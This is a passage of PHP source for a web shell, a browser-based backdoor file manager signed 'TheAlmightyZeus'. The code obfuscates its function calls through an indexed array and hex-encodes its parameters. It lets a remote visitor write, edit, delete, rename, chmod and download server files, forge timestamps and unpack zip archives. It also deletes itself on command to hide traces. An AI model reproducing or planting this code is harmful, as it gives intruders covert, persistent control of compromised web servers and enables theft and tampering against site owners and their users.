										'.$d_.'
								'.$c_.'
								
					<script>
						$("#b64").change(function() {
							if($("#b64 option:selected").val() == 0) {
								var X = $("textarea").val();
								var Z = atob(X);
								$("textarea").val(Z);
							}
							else {
								var N = $("textarea").val();
								var I = btoa(N);
								$("textarea").val(I);
							}
						});
					</script>';
					if(isset($_POST["e"])) {
						if($_POST["b64"] == "1") {
							$ex = $GNJ[7]($_POST["e"]);
						}
						else {
							$ex = $_POST["e"];
						}
						$fp = $GNJ[17](uhex($_GET["e"]), 'w');
						if($GNJ[18]($fp, $ex)) {
							OK();
						}
						else {
							ER();
						}
						$GNJ[19]($fp);
					  }
					}
					elseif(isset($_GET["x"])) {
						rec(uhex($_GET["x"]));
						if($GNJ[26](uhex($_GET["x"]))) {
							ER();
						}
						else {
							OK();
						}

					}
					elseif(isset($_GET["t"])) {
						echo $a_.uhex($_GET["t"]).$b_.'
									<form action="" method="post">
										<input name="t" class="x" type="text" value="'.$GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))).'">
										'.$d_.'
								'.$c_;
					if( !empty($_POST["t"]) ) {
						$p = $GNJ[33]($_POST["t"]);
						if($p) {
							if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) {
								ER();
							}
							else {
								OK();
							}
						}
						else {
							ER();
						}
					  }
					}
					elseif(isset($_GET["k"])) {
						echo $a_.uhex($_GET["k"]).$b_.'
									<form action="" method="post">
										<input name="b" class="x" type="text" value="'.$GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4).'">
										'.$d_.'
								'.$c_;
					if(!empty($_POST["b"])) {
						$x = $_POST["b"];
						$t = 0;
					for($i=strlen($x)-1;$i>=0;--$i)
						$t += (int)$x[$i]*pow(8, (strlen($x)-$i-1));
					if(!$GNJ[12](uhex($_GET["k"]), $t)) {
						ER();
					}
					else {
						OK();
						  }
						}
					}
					elseif(isset($_GET["l"])) {
						echo $a_.'+DIR'.$b_.'
									<form action="" method="post">
										<input name="l" class="x" type="text" value="">
										'.$d_.'
								'.$c_;
					if(isset($_POST["l"])) {
						if(!$GNJ[11]($_POST["l"])) {
							ER();
						}
						else {
							OK();
						}
					  }
					}
					elseif(isset($_GET["q"])) {
						if($GNJ[10](__FILE__)) {
							$GNJ[38]($GNJ[9]);
							header("Location: ".basename($_SERVER['PHP_SELF'])."");
							exit();
						}
						else {
							echo $g;
						}
					}
					elseif(isset($_GET["n"])) {
						echo $a_.'+FILE'.$b_.'
									<form action="" method="post">
										<input name="n" class="x" type="text" value="">
										'.$d_.'
								'.$c_;
					if(isset($_POST["n"])) {
						if(!$GNJ[25]($_POST["n"])) {
							ER();
						}
						else {
							OK();
						}
					  }
					}
					elseif(isset($_GET["r"])) {
						echo $a_.uhex($_GET["r"]).$b_.'
									<form action="" method="post">
										<input name="r" class="x" type="text" value="'.uhex($_GET["r"]).'">
										'.$d_.'
								'.$c_;
					if(isset($_POST["r"])) {
						if($GNJ[26]($_POST["r"])) {
							ER();
						}
						else {
							if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
								OK();
							}
							else {
								ER();
							}
						  }
					   }
					}
					elseif(isset($_GET["z"])) {
						$zip = new ZipArchive;
						$res = $zip->open(uhex($_GET["z"]));
							if($res === TRUE) {
								$zip->extractTo(uhex($_GET["d"]));
								$zip->close();
								OK();
							} else {
								ER();
						  }
					}
					else {
					echo '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th width="44%">[ NAME ]</th>
								<th width="11%">[ SIZE ]</th>
								<th width="17%">[ PERM ]</th>
								<th width="17%">[ DATE ]</th>
								<th width="11%">[ ACT ]</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td>
									<a class="ajx" href="?d='.hex($d).'&n">+FILE</a>
									<a class="ajx" href="?d='.hex($d).'&l">+DIR</a>
								</td>
							</tr>
						';

							$h = "";
							$j = "";
							$w = $GNJ[13]($d);
							if($GNJ[28]($w) || $GNJ[29]($w)) {
							foreach($w as $c){
								$e = $GNJ[14]("\\", "/", $d);
								if(!$GNJ[30]($c, ".zip")) {
									$zi = '';
								}
								else {
									$zi = '<a href="?d='.hex($e).'&z='.hex($c).'">U</a>';
								}
								if($GNJ[31]("$d/$c")) {
										$o = "";
								}
								elseif(!$GNJ[32]("$d/$c")) {
										$o = " h";
								}
								else {
										$o = " w";
								}
								$s = $GNJ[34]("$d/$c") / 1024;
								$s = round($s, 3);
								if($s>=1024) { 
									$s = round($s/1024, 2) . " MB";
								} else {
									$s = $s . " KB";
								}
							if(($c != ".") && ($c != "..")){
								($GNJ[8]("$d/$c")) ?
								$h .= '<tr class="r">
							<td>
								<i class="far fa-folder m"></i>
								<a class="ajx" href="?d='.hex($e).hex("/".$c).'">'.$c.'</a>
							</td>
							<td class="x">
								dir
							</td>
							<td class="x">
								<a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
								<a href="?d='.hex($e).'&x='.hex($c).'">D</a>
							</td>
						</tr>
						
						'
							:
								$j .= '<tr class="r">
							<td>
								<i class="far fa-file m"></i>&thinsp;
								<a class="ajx" href="?d='.hex($e).'&s='.hex($c).'">'.$c.'</a>
							</td>
							<td class="x">
								'.$s.'
							</td>
							<td class="x">
								<a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
								<a class="ajx" href="?d='.hex($e).'&e='.hex($c).'">E</a>
								<a href="?d='.hex($e).'&g='.hex($c).'">G</a>
								'.$zi.'
								<a href="?d='.hex($e).'&x='.hex($c).'">D</a>
							</td>
						</tr>
						
						';

							}
						}
					}

						echo $h;
						echo $j;
						echo '</tbody>
						<tfoot>
							<tr>
								<th class="et">
									<a class="ajx" href="?d='.hex($e).'&y">REQUEST</a>
									<a href="?d='.hex($e).'&q">EXIT</a>
								</th>
								<th class="et" width="11%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="11%"></th>
							</tr>
					</tfoot>
				</table>';
					}
					?>

			</article>
			<footer class="x">
				&copy;TheAlmightyZeus
			</footer>
			<?php
			if(isset($_GET["1"])) {
				echo $f;
			}
			elseif(isset($_GET["0"])) {
				echo $g;
			}
			else {
				NULL;
			}
			?>
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
			<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
			<script>
				$(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
			</script>
		</body>
	</html>
<?php
	function rec($j) {
		global $GNJ;
		if(trim(pathinfo($j, PATHINFO_BASENAME ), '.') === '') {
			return;
		}
		if($GNJ[8]($j)) {
			array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
			$GNJ[35]($j);
		}
		else {
			$GNJ[10]($j);
		}
	}
	function dre($y1, $y2) {
		global $GNJ;
		ob_start();
		$GNJ[16]($y1($y2));
		return $GNJ[36]();
	}
	function hex($n) {
		$y='';
		for ($i=0; $i < strlen($n); $i++){
			$y .= dechex(ord($n[$i]));
		}
		return $y;
	}
	function uhex($y) {
		$n='';
		for ($i=0; $i < strlen($y)-1; $i+=2){
			$n .= chr(hexdec($y[$i].$y[$i+1]));
		}
		return $n;
	}
	function OK() {
		global $GNJ, $d;
		$GNJ[38]($GNJ[9]);
		header("Location: ?d=".hex($d)."&1");
		exit();
	}
	function ER() {
		global $GNJ, $d;
		$GNJ[38]($GNJ[9]);
		header("Location: ?d=".hex($d)."&0");
		exit();
	}
	function x($c) {
		global $GNJ;
		$x = $GNJ[24]($c);
		if(($x & 0xC000) == 0xC000) {
			$u = "s";
		}
		elseif(($x & 0xA000) == 0xA000) {
			$u = "l";
		}
		elseif(($x & 0x8000) == 0x8000) {
			$u = "-";
		}
		elseif(($x & 0x6000) == 0x6000) {
			$u = "b";
		}
		elseif(($x & 0x4000) == 0x4000) {
			$u = "d";
		}
		elseif(($x & 0x2000) == 0x2000) {
			$u = "c";
		}
		elseif(($x & 0x1000) == 0x1000) {
			$u = "p";
		}
		else {
			$u = "u";
		}
		$u .= (($x & 0x0100) ? "r" : "-");
		$u .= (($x & 0x0080) ? "w" : "-");
		$u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));
		$u .= (($x & 0x0020) ? "r" : "-");
		$u .= (($x & 0x0010) ? "w" : "-");
		$u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));
		$u .= (($x & 0x0004) ? "r" : "-");
		$u .= (($x & 0x0002) ? "w" : "-");
		$u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));
		return $u;
	}
	if(isset($_GET["g"])) {
		$GNJ[38]($GNJ[9]);
		header("Content-Type: application/octet-stream");
		header("Content-Transfer-Encoding: Binary");
		header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));
		header("Content-disposition: attachment; filename=\"".uhex($_GET["g"])."\"");
		$GNJ[37](uhex($_GET["g"]));
	}
?>